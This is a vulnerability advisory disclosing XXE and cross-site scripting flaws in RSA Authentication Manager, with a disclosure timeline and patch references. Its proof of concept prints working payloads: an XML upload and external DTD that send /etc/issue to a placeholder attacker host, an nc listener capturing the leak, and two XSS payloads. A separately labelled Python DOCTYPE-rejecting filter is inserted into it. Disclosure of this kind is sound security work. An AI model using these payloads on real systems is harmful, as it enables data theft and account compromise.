SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
=======================================================================
              title: XXE & XSS vulnerabilities
            product: RSA Authentication Manager
 vulnerable version: 8.2.1.4.0-build1394922, <8.3 P1
      fixed version: 8.3 P1 and later
         CVE number: CVE-2018-1247
             impact: High
           homepage: https://www.rsa.com
              found: 2017-11-16
                 by: Mantas Juskauskas (Office Vilnius)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about

Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication Manager can be affected by exploiting client-side
issues.

SEC Consult recommends to apply the available patches from the vendor.

Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g. port scanning) or cause a DoS (e.g.
billion laughs attack).

This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)

2) Cross-site Flashing
The vulnerable Flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.

The vulnerability exists in a third party component called pmfso.

This issue has been fixed by RSA as described in the advisory DSA-2018-082.

3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).

This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.

Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:

==========================================================================================
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]
[snip]
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
<key>&e1;</key>
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==========================================================================================

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:

==========================================================================================
# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">
%p2;
==========================================================================================

Assuming that the RSA Authentication Manager OS has network level access to
TCP ports 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:

==========================================================================================
# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1
==========================================================================================

Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.

2) Cross-site Flashing
The issue affects a third party component pmfso (DSA-2018-082).

To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:

https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//

3) DOM based Cross-site Scripting
Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).

To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):

==========================================================================================
<script>
window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";
</script>
==========================================================================================

Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Vulnerable / tested versions:
-----------------------------
The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest
version available during the test.

Vendor contact timeline:
------------------------
2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
            to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
            plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of uncoordinated public
            release and status information.
2018-05-08: Vendor provides an update regarding their public release and
            status of vulnerabilities not included in the release, vendor info:
            * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
              was released on 5/4
            * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
              was released on 5/3
2018-05-16: Security advisory release

Solution:
---------
The vendor has released an advisory that contains recommendations of how to
resolve the reported XML External Entity Injection Vulnerability:
DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required)
Full Disclosure archive:
http://seclists.org/fulldisclosure/2018/May/18

Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (only Example 1) issues provided in the
descriptions above.
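A defender-side counterpart to the XXE finding, added here as an example and not taken from the advisory or from RSA's product code: a Python pre-parse gate that scans uploaded XML with the standard-library expat bindings, which fetch nothing on their own, records any DOCTYPE and entity declarations, and refuses the file when a DOCTYPE is present. The sample documents are constructed for this example (the first mirrors the shape of the payload shown in the proof of concept, with the attacker host replaced by the placeholder attacker.example); the element names and the placeholder host are assumptions, not the product's import schema.

```python
import xml.parsers.expat as expat

# Constructed samples for this example.  EXTERNAL_DTD_XML follows the shape of
# the payload quoted in the advisory with the attacker host replaced by a
# placeholder; the other two are invented and are not the product's real
# token-job schema.
EXTERNAL_DTD_XML = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://attacker.example/a.dtd">
<key>&e1;</key>'''

INTERNAL_ENTITY_XML = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;">
]>
<key>&lol2;</key>'''

BENIGN_XML = b'''<?xml version="1.0" encoding="UTF-8"?>
<tokenJob><key>123456</key></tokenJob>'''


class UnsafeXML(ValueError):
    """Raised by check_upload() when the document carries a DOCTYPE."""


def audit_xml(data: bytes) -> dict:
    """Scan an XML document and report the DTD constructs it declares.

    expat is used purely as a scanner: by default it does not fetch external
    DTDs or external entities, and the handlers below only record what they
    see.  Nothing in the document is resolved.
    """
    report = {"doctype": None, "system_id": None, "has_internal_subset": False,
              "entities": [], "parse_error": None}
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name
        report["system_id"] = system_id          # external subset, if any
        report["has_internal_subset"] = bool(has_internal_subset)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        report["entities"].append({
            "name": name,
            "parameter": bool(is_param),          # %name; entities used in DTD tricks
            "external": system_id is not None,    # SYSTEM/PUBLIC identifier present
            "system_id": system_id,
        })

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Malformed input is recorded, not hidden: a rejected upload should
        # still be logged together with the declarations seen so far.
        report["parse_error"] = str(exc)
    return report


def check_upload(data: bytes) -> dict:
    """Accept-or-reject gate for user-supplied XML.

    Policy: any DOCTYPE is refused.  This is the same rule as enabling
    disallow-doctype-decl on a Java parser; it stops both the external-DTD
    variant (file disclosure, requests to internal systems) and the
    internal-entity variant (billion laughs) before a full parser sees the file.
    """
    report = audit_xml(data)
    if report["doctype"] is not None:
        raise UnsafeXML(f"DOCTYPE '{report['doctype']}' declared "
                        f"(external subset: {report['system_id']!r}, "
                        f"entities: {[e['name'] for e in report['entities']]})")
    return report


def is_accepted(data: bytes) -> bool:
    """True when check_upload() lets the document through."""
    try:
        check_upload(data)
    except UnsafeXML:
        return False
    return True


if __name__ == "__main__":
    for label, doc in (("external DTD", EXTERNAL_DTD_XML),
                       ("internal entities", INTERNAL_ENTITY_XML),
                       ("benign", BENIGN_XML)):
        print(f"{label:18s} accepted={is_accepted(doc)} report={audit_xml(doc)}")
```

Refusing every DOCTYPE is the setting to look for in importing code regardless of language (disallow-doctype-decl on a JAXP DocumentBuilderFactory is the Java spelling of the same rule). Where a DTD has to be accepted for a legitimate format, the report still names the external identifiers that were declared, so the upload can be logged and reviewed rather than silently parsed.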

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Juskauskas / @2018